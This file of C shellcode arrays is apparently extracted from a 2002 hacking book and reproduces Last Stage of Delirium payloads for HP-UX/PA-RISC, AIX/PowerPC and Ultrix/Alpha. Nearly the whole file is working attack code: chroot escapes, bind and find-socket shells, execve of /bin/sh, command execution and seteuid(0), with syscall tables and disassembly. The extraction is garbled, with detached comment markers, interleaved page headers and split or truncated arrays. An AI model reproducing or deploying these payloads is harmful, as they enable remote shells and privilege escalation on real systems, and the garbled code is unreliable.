"\x20\x20\x08\x01"
"\xe4\x20\xe0\x08"
"\xb4\x16\x70\xfc"
;

/*
/*
/*
/*
/*
/*
/*

6*4 bytes
xor
%r26,%r26,%r26
xor
%r25,%r25,%r25
xor
%r24,%r24,%r24
ldil
L%0xc0000004,%r1
ble
R%0xc0000004(%sr7,%r1)
addi,> 0x7e,%r0,%r22

*/
*/
*/
*/
*/
*/
*/

/* HP-UX/PA-RISC chroot escape.  Words 1-6 are a small syscall stub reached with
 * `bl <chrootcode+4>,%rp` (%r23 selects the gateway; `bv,n 0(%rp)` returns);
 * word 7 ("a...") is the inline path.  Sequence: mkdir (%r22=0x88), chroot
 * (0x3d), chdir("..") (0xc) repeated while %r13 (starting at 0xff) counts down,
 * then a final chroot.  24*4 = 96 bytes, 97 with the literal's NUL. */
char chrootcode[]=
"\xb4\x17\x40\x04"
"\xeb\x57\x40\x02"
"\x20\x20\x08\x01"
"\xe4\x20\xe0\x08"
"\x0a\xf7\x02\x97"
"\xe8\x40\xc0\x02"
"\x61\x2e\x2e\x2e"
"\xb7\x5a\x40\x12"
"\x08\x1a\x06\x0c"
"\x0d\x80\x12\x06"
"\xe8\x5f\x1f\xad"
"\xb4\x16\x71\x10"
"\x08\x0c\x06\x1a"
"\xe8\x5f\x1f\x95"
"\xb4\x16\x70\x7a"
"\xb4\x0d\x01\xfe"
"\xb5\x9a\x40\x02"
"\xe8\x5f\x1f\x75"
"\xb4\x16\x70\x18"
"\x88\x0d\x3f\xdd"
"\xb5\xad\x07\xff"
"\xb5\x9a\x40\x04"
"\xe8\x5f\x1f\x4d"
"\xb4\x16\x70\x7a"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

24*4 bytes
*/
addi,< 0x2,%r0,%r23
*/
blr,n
%r23,%r26
*/
ldil
L%0xc0000004,%r1
*/
ble
R%0xc0000004(%sr7,%r1) */
xor
%r23,%r23,%r23
*/
bv,n
0(%rp)
*/
a...
*/
addi,< 0x9,%r26,%r26
*/
add
%r26,%r0,%r12
*/
stbs
%r0,0x3(%r12)
*/
bl
<chrootcode+4>,%rp
*/
addi,> 0x88,%r0,%r22
*/
add
%r12,%r0,%r26
*/
bl
<chrootcode+4>,%rp
*/
addi,> 0x3d,%r0,%r22
*/
addi
0xff,%r0,%r13
*/
addi,< 0x1,%r12,%r26
*/
bl
<chrootcode+4>,%rp
*/
addi,> 0xc,%r0,%r22
*/
combf,= %r13,%r0,<chrootcode+64> */
addi
-0x1,%r13,%r13
*/
addi,< 0x2,%r12,%r26
*/
bl
<chrootcode+4>,%rp
*/
addi,> 0x3d,%r0,%r22
*/

char findsckcode[]=
"\xe9\x9f\x1f\xfd"
"\x0b\x18\x02\x98"

/* 30*4 bytes
/* bl
<findsckcode+4>,%r12
/* xor
%r24,%r24,%r24

*/
*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


"\xb4\x0e\x01\xde"
"\xb5\x98\x07\xd3"
"\xb5\x99\x07\xdb"
"\x08\x0e\x06\x1a"
"\x20\x20\x08\x01"
"\xe4\x20\xe0\x08"
"\xb4\x16\x02\x2c"
"\x80\x1c\x20\x20"
"\x0b\x18\x02\x98"
"\xb5\xce\x07\xff"
"\x88\x0e\x3f\xad"
"\x0b\x18\x02\x98"
"\x61\x61\x12\x34"
"\xb5\x99\x06\x3f"
"\x47\x2f\x02\x20"
"\x45\x90\x3f\xdf"
"\x82\x0f\x20\x10"
"\x0b\x18\x02\x98"
"\x8a\x0f\x3f\x6d"
"\xb5\xce\x07\xff"
"\xb4\x0f\x40\x04"
"\x08\x0e\x06\x1a"
"\x08\x0f\x06\x19"
"\x20\x20\x08\x01"
"\xe4\x20\xe0\x08"
"\xb4\x16\x70\xb4"
"\x88\x0f\x3f\xcd"
"\xb5\xef\x07\xff"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

addi
addi
addi
add
ldil
ble
addi
comb,=
xor
addi
combf,=
xor

0xef,%r0,%r14
*/
-0x17,%r12,%r24
*/
-0x13,%r12,%r25
*/
%r14,%r0,%r26
*/
L%0xc0000004,%r1
*/
R%0xc0000004(%sr7,%r1) */
0x116,%r0,%r22
*/
%ret0,%r0,<findsckcode+60> */
%r24,%r24,%r24
*/
-0x1,%r14,%r14
*/
%r14,%r0,<findsckcode+12> */
%r24,%r24,%r24
*/

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

addi
ldh
ldh
comb,=
xor
combf,=
addi
addi,<
add
add
ldil
ble
addi,>
combf,=
addi

-0xe1,%r12,%r25
*/
0x110(%r25),%r15
*/
-0x11(%r12),%r16
*/
%r15,%r16,<findsckcode+88> */
%r24,%r24,%r24
*/
%r15,%r16,<findsckcode+12> */
-0x1,%r14,%r14
*/
0x2,%r0,%r15
*/
%r14,%r0,%r26
*/
%r15,%r0,%r25
*/
L%0xc0000004,%r1
*/
R%0xc0000004(%sr7,%r1) */
0x5a,%r0,%r22
*/
%r15,%r0,<findsckcode+92> */
-0x1,%r15,%r15
*/

/* HP-UX/PA-RISC bind shell: the same syscall stub as chrootcode in words 1-6,
 * then socket (%r22=0x122), bind (0x114), listen (0x119), accept (0x113) and
 * dup2 (0x5a) for fds 2..0 (%r14 counts down from 2).  The listening port is
 * the 16-bit value at byte offset 26 (BINDSCKPORTOFS; 0x2345 in word 7, whose
 * first two bytes are the sockaddr's 0x61/0x02 header).  37*4 = 148 bytes, 149
 * with the literal's NUL. */
char bindsckcode[]=
"\xb4\x17\x40\x04"
"\xe9\x97\x40\x02"
"\x20\x20\x08\x01"
"\xe4\x20\xe0\x08"
"\x0a\xf7\x02\x97"
"\xe8\x40\xc0\x02"
"\x61\x02\x23\x45"
"\xb4\x1a\x40\x04"
"\xb4\x19\x40\x02"
"\x0b\x18\x02\x98"
"\xe8\x5f\x1f\xad"
"\xb4\x16\x72\x44"
"\x08\x1c\x06\x0d"
"\xb5\x8c\x40\x10"
"\xb4\x18\x40\x20"
"\x08\x0d\x06\x1a"
"\x0d\x80\x12\x8a"
"\xb5\x99\x40\x02"
"\xe8\x5f\x1f\x6d"
"\xb4\x16\x72\x28"
"\x08\x0d\x06\x1a"
"\xb4\x19\x40\x02"
"\xe8\x5f\x1f\x4d"
"\xb4\x16\x72\x32"
"\x08\x0d\x06\x1a"
"\x0b\x39\x02\x99"
"\x0b\x18\x02\x98"
"\xe8\x5f\x1f\x25"
"\xb4\x16\x72\x26"
"\xb4\x0e\x40\x04"
"\x08\x1c\x06\x0c"
"\x08\x0c\x06\x1a"
"\x08\x0e\x06\x19"
"\xe8\x5f\x1e\xf5"
"\xb4\x16\x70\xb4"
"\x88\x0e\x3f\xd5"
"\xb5\xce\x07\xff"
;

/*
/*
/*
/*
/*
/*
/*

37*4 bytes
addi,< 0x2,%r0,%r23
blr,n
%r23,%r12
ldil
L%0xc0000004,%r1
ble
R%0xc0000004(%sr7,%r1)
xor
%r23,%r23,%r23
bv,n
0(%rp)

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

addi,<
addi,<
xor
bl
addi,>
add
addi,<
addi,<
add
stw
addi,<
bl
addi,>
add
addi,<
bl
addi,>
add
xor
xor
bl
addi,>
addi,<
add
add
add
bl
addi,>
combf,=
addi

/* HP-UX/PA-RISC stack-pointer probe: `be 0x0(%sr0,%rp)` with `copy %sp,%ret0`
 * in the delay slot returns %sp.  8 bytes plus the literal's NUL.
 * NOTE(review): only meaningful where the array's memory is executable. */
char jump[]=
"\xe0\x40\x00\x00"
"\x37\xdc\x00\x00"
;

/* be
/* copy

#define FINDSCKPORTOFS
#define BINDSCKPORTOFS

58
26

*/
*/
*/
*/
*/
*/
*/

0x2,%r0,%r26
*/
0x1,%r0,%r25
*/
%r24,%r24,%r24
*/
<bindsckcode+4>,%rp
*/
0x122,%r0,%r22
*/
%ret0,%r0,%r13
*/
0x8,%r12,%r12
*/
0x10,%r0,%r24
*/
%r13,%r0,%r26
*/
%r0,0x5(%r12)
*/
0x1,%r12,%r25
*/
<bindsckcode+4>,%rp
*/
0x114,%r0,%r22
*/
%r13,%r0,%r26
*/
0x1,%r0,%r25
*/
<bindsckcode+4>,%rp
*/
0x119,%r0,%r22
*/
%r13,%r0,%r26
*/
%r25,%r25,%r25
*/
%r24,%r24,%r24
*/
<bindsckcode+4>,%rp
*/
0x113,%r0,%r22
*/
0x2,%r0,%r14
*/
%ret0,%r0,%r12
*/
%r12,%r0,%r26
*/
%r14,%r0,%r25
*/
<bindsckcode+4>,%rp
*/
0x5a,%r0,%r22
*/
%r14,%r0,<bindsckcode+124> */
-0x1,%r14,%r14
*/

0x0(%sr0,%rp)
%sp,%ret0

*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book

#endif

AIX/POWER/PowerPC codes, file: powerpc-aix


/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## asmcodes for aix 4.1 4.2 4.3 power/powerpc
/*
syscall
----------execve
execve
seteuid
mkdir
chroot
chdir
getpeername
socket
bind
listen
accept
close
kfcntl
*/

%r2
---x003
x003
x068
x07f
x06f
x06d
x041
x057
x056
x055
x053
x05e
x0d6
v4.1

%r2
---x002
x002
x071
x08e
x078
x076
x046
x05b
x05a
x059
x058
x062
x0e7
v4.2

%r2
---x004
x004
x082
x0a0
x089
x087
x053
x069
x068
x067
x065
x071
x0fc
v4.3

*://lsd-pl.net/ #*/
#*/

%r3,%r4,%r5
----------------------------------------------------->path="/bin/sh",->[->a0=path,0],0
->path="/bin/sh",->[->a0=path,->a1="-c",->a2=cmd,0],0
euid=0
->path="t..",mode= (each value is valid)
->path={"t..","."}
->path=".."
sfd,->sadr=[],->[len=0x2c]
AF_INET=2,SOCK_STREAM=1,prot=0
sfd,->sadr=[0x2c,0x02,hi,lo,0,0,0,0],len=0x10
sfd,backlog=5
sfd,0,0
fd={0,1,2}
sfd,F_DUPFD=0,fd={0,1,2}

#if defined(POWERPC) && defined(AIX)


/* AIX/PowerPC interactive shell, self-contained variant: execve("/bin/sh",
 * {path, 0}, 0) via `crorc cr6,cr6,cr6; svca`.  The syscall number differs per
 * AIX release (0x03/0x02/0x04 for 4.1/4.2/4.3 in the table above), so exactly
 * one of V41/V42/V43 must be defined: the selected byte follows "/bin/sh", is
 * loaded into r2 (`lbz r2,-241(r31)`) and then overwritten with 0 (`stb`) to
 * terminate the path.  With a version byte, 12*4+8 = 56 bytes (sizeof 57);
 * with none defined, the byte is absent and the code reads the literal's NUL
 * instead. */
char _shellcode[]=
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"
"\x7f\xe8\x02\xa6"
"\x3b\xff\x01\x20"
"\x38\x7f\xff\x08"
"\x38\x9f\xff\x10"
"\x90\x7f\xff\x10"
"\x90\xbf\xff\x14"
"\x88\x5f\xff\x0f"
"\x98\xbf\xff\x0f"
"\x4c\xc6\x33\x42"
"\x44\xff\xff\x02"
"/bin/sh"
#ifdef V41
"\x03"
#endif
#ifdef V42
"\x02"
#endif
#ifdef V43
"\x04"
#endif
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

12*4+8 bytes
xor.
r5,r5,r5
bnel
<shellcode>
mflr
r31
cal
r31,0x120(r31)
cal
r3,-248(r31)
cal
r4,-240(r31)
st
r3,-240(r31)
st
r5,-236(r31)
lbz
r2,-241(r31)
stb
r5,-241(r31)
crorc
cr6,cr6,cr6
svca

char _setreuidshellcode[]=
"\x7e\x94\xa2\x79"
"\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6"
"\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0"
"\x7e\x83\xa3\x78"
"\x3a\xd5\xfe\xe4"
"\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42"
"\x44\xff\xff\x02"
#ifdef V41
"\x68\x03\xff\xff"
#endif
#ifdef V42
"\x71\x02\xff\xff"
#endif
#ifdef V43
"\x82\x04\xff\xff"
#endif
"\x38\x75\xff\x04"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

19*4+7 bytes
xor.
r20,r20,r20
bnel
(setreuidcode)
mflr
r21
cal
r21,0x140(r21)
lbz
r2,-288(r21)
mr
r3,r20
cal
r22,-284(r21)
mtlr
r22
crorc
cr6,cr6,cr6
svca

/* cal

r3,-252(r21)

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


"\x38\x95\xff\x0c"
"\x7e\x85\xa3\x78"
"\x90\x75\xff\x0c"
"\x92\x95\xff\x10"
"\x88\x55\xfe\xe1"
"\x9a\x95\xff\x0b"
"\x4b\xff\xff\xd8"
"/bin/sh"

/*
/*
/*
/*
/*
/*
/*

cal
mr
st
st
lbz
stb
bl

r4,-244(r21)
r5,r20
r3,-244(r21)
r20,-240(r21)
r2,-287(r21)
r20,-245(r21)
(setreuidcode+32)

*/
*/
*/
*/
*/
*/
*/

/* AIX/PowerPC shared syscall stub used by the shellcode/cmdshellcode/
 * setreuidcode/chrootcode/findsckcode below.  r20 is zeroed, r21 is made to
 * point into this buffer (bnel/mflr), and `cal r23,-467(r22)` with r22=0x1ff
 * (= 44) skips over the 12-byte per-release syscall-number table to the
 * `cal r21,-8(r21)` tail, which leaves r21 at the `crorc; svca` pair (offset
 * 44); the table occupies offsets 32..43 = r21-12..r21-1.  Later codes fetch a
 * number with `lbz r2,-N(r21)` and enter via `mtctr r21; bctrl`.  Exactly one
 * of V41/V42/V43 must be defined for the "14*4 bytes" layout to hold; with
 * none the table is absent (44 bytes) and the -N(r21) offsets no longer line
 * up. */
char syscallcode[]=
"\x7e\x94\xa2\x79"
"\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6"
"\x3a\xc0\x01\xff"
"\x3a\xf6\xfe\x2d"
"\x7e\xb5\xba\x14"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x20"
#ifdef V41
"\x03\x68\x41\x5e"
"\x6d\x7f\x6f\xd6"
"\x57\x56\x55\x53"
#endif
#ifdef V42
"\x02\x71\x46\x62"
"\x76\x8e\x78\xe7"
"\x5b\x5a\x59\x58"
#endif
#ifdef V43
"\x04\x82\x53\x71"
"\x87\xa0\x89\xfc"
"\x69\x68\x67\x65"
#endif
"\x4c\xc6\x33\x42"
"\x44\xff\xff\x02"
"\x3a\xb5\xff\xf8"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*

14*4 bytes
xor.
r20,r20,r20
bnel
<syscallcode>
mflr
r21
lil
r22,0x1ff
cal
r23,-467(r22)
cax
r21,r21,r23
mtctr
r21
bctr

/* AIX/PowerPC interactive shell, stub-dependent variant: same argv set-up as
 * _shellcode, but the execve number comes from syscallcode's table
 * (`lbz r2,-12(r21)`) and the trap is entered with `mtctr r21; bctr`, so
 * syscallcode must have run first and left r21 intact.  12*4+7 = 55 bytes,
 * 56 with the literal's NUL. */
char shellcode[]=
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"
"\x7f\xe8\x02\xa6"
"\x3b\xff\x01\x20"
"\x38\x7f\xff\x08"
"\x38\x9f\xff\x10"
"\x90\x7f\xff\x10"
"\x90\xbf\xff\x14"
"\x88\x55\xff\xf4"
"\x98\xbf\xff\x0f"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x20"
"/bin/sh"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

12*4+7 bytes
xor.
r5,r5,r5
bnel
<shellcode>
mflr
r31
cal
r31,0x120(r31)
cal
r3,-248(r31)
cal
r4,-240(r31)
st
r3,-240(r31)
st
r5,-236(r31)
lbz
r2,-12(r21)
stb
r5,-241(r31)
mtctr
r21
bctr

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

/* AIX/PowerPC single command via syscallcode (r21): execve("/bin/sh",
 * {path, "-c", cmd, 0}, 0).  The stb at prefix+7 and prefix+10 terminate
 * "/bin/sh" and "-c"; r7 = prefix+12 is the command, so the original prefix is
 * presumably 12 bytes — the literal here has 11, so the "17*4+12+cmdlen" count
 * appears to assume a trailing space lost in extraction.  sizeof as written is
 * 80. */
char cmdshellcode[]=
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"
"\x7f\xe8\x02\xa6"
"\x3b\xff\x01\x2c"
"\x38\x7f\xff\x10"
"\x38\x9f\xfe\xc8"
"\x38\xdf\xff\x18"
"\x38\xff\xff\x1c"
"\x90\x7f\xfe\xc8"
"\x90\xdf\xfe\xcc"
"\x90\xff\xfe\xd0"
"\x90\xbf\xfe\xd4"
"\x98\xbf\xff\x17"
"\x98\xbf\xff\x1a"
"\x88\x55\xff\xf4"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x20"
"/bin/sh -c "
/* command */
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

17*4+12+cmdlen bytes
xor.
r5,r5,r5
bnel
<cmdshellcode>
mflr
r31
cal
r31,0x12c(r31)
cal
r3,-240(r31)
cal
r4,-312(r31)
cal
r6,-232(r31)
cal
r7,-228(r31)
st
r3,-312(r31)
st
r6,-308(r31)
st
r7,-304(r31)
st
r5,-300(r31)
stb
r5,-233(r31)
stb
r5,-230(r31)
lbz
r2,-12(r21)
mtctr
r21
bctr

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

/* crorc
/* svca
/* cal

cr6,cr6,cr6
0x0
r21,-8(r21)

*/
*/
*/
*/
*/
*/
*/
*/
*/

*/
*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


/* AIX/PowerPC privilege restore via syscallcode: r2 = table byte at r21-11
 * (the seteuid entry: 0x68/0x71/0x82 by release), r3 = r20 (zeroed by
 * syscallcode), then `mtctr r21; bctrl`.  Despite the name this performs
 * seteuid(0) per the syscall table above.  4*4 = 16 bytes, 17 with the
 * literal's NUL. */
char setreuidcode[]=
"\x88\x55\xff\xf5"
"\x7e\x83\xa3\x78"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
;

/*
/*
/*
/*
/*

4*4 bytes
lbz
r2,-11(r21)
mr
r3,r20
mtctr
r21
bctrl

*/
*/
*/
*/
*/

/* AIX/PowerPC chroot escape via syscallcode: word 0 (`cmpi cr0,r20,0x2e2e`)
 * doubles as the inline "t.." path bytes; then mkdir (table byte r21-7),
 * chroot (r21-6), chdir("..") (r21-8) repeated 0x101 = 257 times (r25), and a
 * final chroot.  23*4 = 92 bytes, 93 with the literal's NUL. */
char chrootcode[]=
"\x2c\x74\x2e\x2e"
"\x41\x82\xff\xfd"
"\x7f\x08\x02\xa6"
"\x92\x98\xff\xfc"
"\x38\x78\xff\xf9"
"\x88\x55\xff\xf9"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x38\x78\xff\xf9"
"\x88\x55\xff\xfa"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x3b\x20\x01\x01"
"\x38\x78\xff\xfa"
"\x88\x55\xff\xf8"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x37\x39\xff\xff"
"\x40\x82\xff\xec"
"\x38\x78\xff\xfb"
"\x88\x55\xff\xfa"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

23*4 bytes
cmpi
cr0,r20,0x2e2e
beql
<chrootcode>
mflr
r24
st
r20,-4(r24)
cal
r3,-7(r24)
lbz
r2,-7(r21)
mtctr
r21
bctrl
cal
r3,-7(r24)
lbz
r2,-6(r21)
mtctr
r21
bctrl
lil
r25,0x101
cal
r3,-6(r24)
lbz
r2,-8(r21)
mtctr
r21
bctrl
ai.
r25,r25,-1
bne
<chrootcode+52>
cal
r3,-5(r24)
lbz
r2,-6(r21)
mtctr
r21
bctrl

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

/* AIX/PowerPC find-socket via syscallcode: word 0 (`cmpi cr0,r20,0x1234`)
 * holds the 16-bit port to match at byte offset 2 (FINDSCKPORTOFS).  The loop
 * calls getpeername (table byte r21-10) on candidate descriptors (r26 from 0x16
 * down) and compares the peer port, then close (r21-9) and kfcntl (r21-5) the
 * match onto fds 2..0.  38*4 = 152 bytes, 153 with the literal's NUL. */
char findsckcode[]=
"\x2c\x74\x12\x34"
"\x41\x82\xff\xfd"
"\x7f\x08\x02\xa6"
"\x3b\x36\xfe\x2d"
"\x3b\x40\x01\x01"
"\x7f\x78\xca\x14"
"\x7f\x69\x03\xa6"
"\x4e\x80\x04\x20"
"\xa3\x78\xff\xfe"
"\xa3\x98\xff\xfa"
"\x7c\x1b\xe0\x40"
"\x3b\x36\xfe\x59"
"\x41\x82\xff\xe4"
"\x7f\x43\xd3\x78"
"\x38\x98\xff\xfc"
"\x38\xb8\xff\xf4"
"\x93\x38\xff\xf4"
"\x88\x55\xff\xf6"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x37\x5a\xff\xff"
"\x2d\x03\xff\xff"
"\x40\x8a\xff\xc8"
"\x40\x82\xff\xd8"
"\x3b\x36\xfe\x03"
"\x3b\x76\xfe\x02"
"\x7f\x23\xcb\x78"
"\x88\x55\xff\xf7"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x7c\x7a\xda\x14"
"\x7e\x84\xa3\x78"
"\x7f\x25\xcb\x78"
"\x88\x55\xff\xfb"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x37\x39\xff\xff"
"\x40\x80\xff\xd4"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

38*4 bytes
cmpi
cr0,r20,0x1234
beql
<findsckcode>
mflr
r24
cal
r25,-467(r22)
lil
r26,0x16
cax
r27,r24,r25
mtctr
r27
bctr
lhz
r27,-2(r24)
lhz
r28,-6(r24)
cmpl
cr0,r27,r28
cal
r25,-423(r22)
beq
<findsckcode+20>
mr
r3,r26
cal
r4,-4(r24)
cal
r5,-12(r24)
st
r25,-12(r24)
lbz
r2,-10(r21)
mtctr
r21
bctrl
ai.
r26,r26,-1
cmpi
cr2,r3,-1
bne
cr2,<findsckcode+32>
bne
<findsckcode+48>
cal
r25,-509(r22)
cal
r27,-510(r22)
mr
r3,r25
lbz
r2,-9(r21)
mtctr
r21
bctrl
cax
r3,r26,r27
mr
r4,r20
mr
r5,r25
lbz
r2,-5(r21)
mtctr
r21
bctrl
ai.
r25,r25,-1
bge
<findsckcode+100>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char bindsckcode[]=
"\x2c\x74\x12\x34"
"\x41\x82\xff\xfd"

/* 42*4 bytes
/* cmpi
cr0,r20,0x1234
/* beql
<bindsckcode>

*/
*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


"\x7f\x08\x02\xa6"
"\x92\x98\xff\xfc"
"\x38\x76\xfe\x03"
"\x38\x96\xfe\x02"
"\x98\x78\xff\xf9"
"\x7e\x85\xa3\x78"
"\x88\x55\xff\xfc"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x7c\x79\x1b\x78"
"\x38\x98\xff\xf8"
"\x38\xb6\xfe\x11"
"\x88\x55\xff\xfd"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x7f\x23\xcb\x78"
"\x38\x96\xfe\x06"
"\x88\x55\xff\xfe"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x7f\x23\xcb\x78"
"\x7e\x84\xa3\x78"
"\x7e\x85\xa3\x78"
"\x88\x55\xff\xff"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x7c\x79\x1b\x78"
"\x3b\x56\xfe\x03"
"\x7f\x43\xd3\x78"
"\x88\x55\xff\xf7"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x7f\x23\xcb\x78"
"\x7e\x84\xa3\x78"
"\x7f\x45\xd3\x78"
"\x88\x55\xff\xfb"
"\x7e\xa9\x03\xa6"
"\x4e\x80\x04\x21"
"\x37\x5a\xff\xff"
"\x40\x80\xff\xd4"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

mflr
st
cal
cal
stb
mr
lbz
mtctr
bctrl
mr
cal
cal
lbz
mtctr
bctrl
mr
cal
lbz
mtctr
bctrl
mr
mr
mr
lbz
mtctr
bctrl
mr
cal
mr
lbz
mtctr
bctrl
mr
mr
mr
lbz
mtctr
bctrl
ai.
bge

r24
r20,-4(r24)
r3,-509(r22)
r4,-510(r22)
r3,-7(r24)
r5,r20
r2,-4(r21)
r21
r25,r3
r4,-8(r24)
r5,-495(r22)
r2,-3(r21)
r21
r3,r25
r4,-506(r22)
r2,-2(r21)
r21
r3,r25
r4,r20
r5,r20
r2,-1(r21)
r21
r25,r3
r26,-509(r22)
r3,r26
r2,-9(r21)
r21
r3,r25
r4,r20
r5,r26
r2,-5(r21)
r21
r26,r26,-1
<bindsckcode+120>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

;
#define FINDSCKPORTOFS
#define BINDSCKPORTOFS

2
2

#endif

Ultrix/ALPHA codes, file: alpha-ultrix


/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## asmcodes for ultrix 5.0 alpha
/*
syscall
----------execv
execv
setreuid
*/

%v0
---x00b
x00b
x07e

*://lsd-pl.net/ #*/
#*/

%a0,%a1,%a2,%a3
--------------------------------------------------------------->path="/bin/sh",->[->a0=path,0]
->path="/bin/sh",->[->a0=path,->a1="-c",->a2=cmd,0]
ruid,euid=0

#if defined(ALPHA) && defined(ULTRIX)


char shellcode[]=
"\xfb\x6b\x7f\x26"
"\x01\x80\x73\x22"
"\x40\x01\x7e\xb2"
"\x40\x01\x9e\x22"
"\x10\x40\x54\x6b"
"\x80\x82\x5a\x23"
"\x12\x04\xff\x47"
"\xbb\x7d\xfa\x3b"
"\xb4\x7d\x1a\x22"
"\xc4\x7d\x1a\xb6"
"\xc4\x7d\x3a\x22"
"\xcc\x7d\xfa\xb7"
"\x13\x74\xf0\x47"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

18*4+7 bytes
ldah
a3,27643(zero)
lda
a3,-32767(a3)
stl
a3,320(sp)
lda
a4,320(sp)
jsr
ra,(a4),0x10
lda
ra,-32128(ra)
bis
zero,zero, a2
stb
zero,32187(ra)
lda
a0,32180(ra)
stq
a0,32196(ra)
lda
a1,32196(ra)
stq
zero,32204(ra)
bis
zero,0x83,a3

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


"\x80\x20\x7e\xb2"
"\x80\x20\x9e\x22"
"\xbb\x02\xbf\x22"
"\x50\xfd\x15\x20"
"\x10\x40\x54\x6b"
"/bin/sh"

/*
/*
/*
/*
/*

stl
lda
lda
lda
jsr

a3,8320(sp)
a4,8320(sp)
a5,699(zero)
v0,-640(a5)
ra,(a4),0x10

*/
*/
*/
*/
*/

char cmdshellcode[]=
"\xfb\x6b\x7f\x26"
"\x01\x80\x73\x22"
"\x40\x01\x7e\xb2"
"\x40\x01\x9e\x22"
"\x10\x40\x54\x6b"
"\x80\x82\x5a\x23"
"\xcb\x7d\xfa\x3b"
"\xce\x7d\xfa\x3b"
"\xc4\x7d\x1a\x22"
"\x5c\x7d\x1a\xb6"
"\xcc\x7d\x7a\x22"
"\x64\x7d\x7a\xb6"
"\xd0\x7d\x7a\x22"
"\x6c\x7d\x7a\xb6"
"\x74\x7d\xfa\xb7"
"\x5c\x7d\x3a\x22"
"\x13\x74\xf0\x47"
"\x80\x20\x7e\xb2"
"\x80\x20\x9e\x22"
"\xbb\x02\xbf\x22"
"\x50\xfd\x15\x20"
"\x10\x40\x54\x6b"
"/bin/sh -c "
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

22*4+7 bytes
ldah
a3,27643(zero)
lda
a3,-32767(a3)
stl
a3,320(sp)
lda
a4,320(sp)
jsr
ra,(a4),0x10
lda
ra,-32128(ra)
stb
zero,32203(ra)
stb
zero,32206(ra)
lda
a0,32196(ra)
stq
a0,32092(ra)
lda
a3,32204(ra)
stq
a3,32100(ra)
lda
a3,32208(ra)
stq
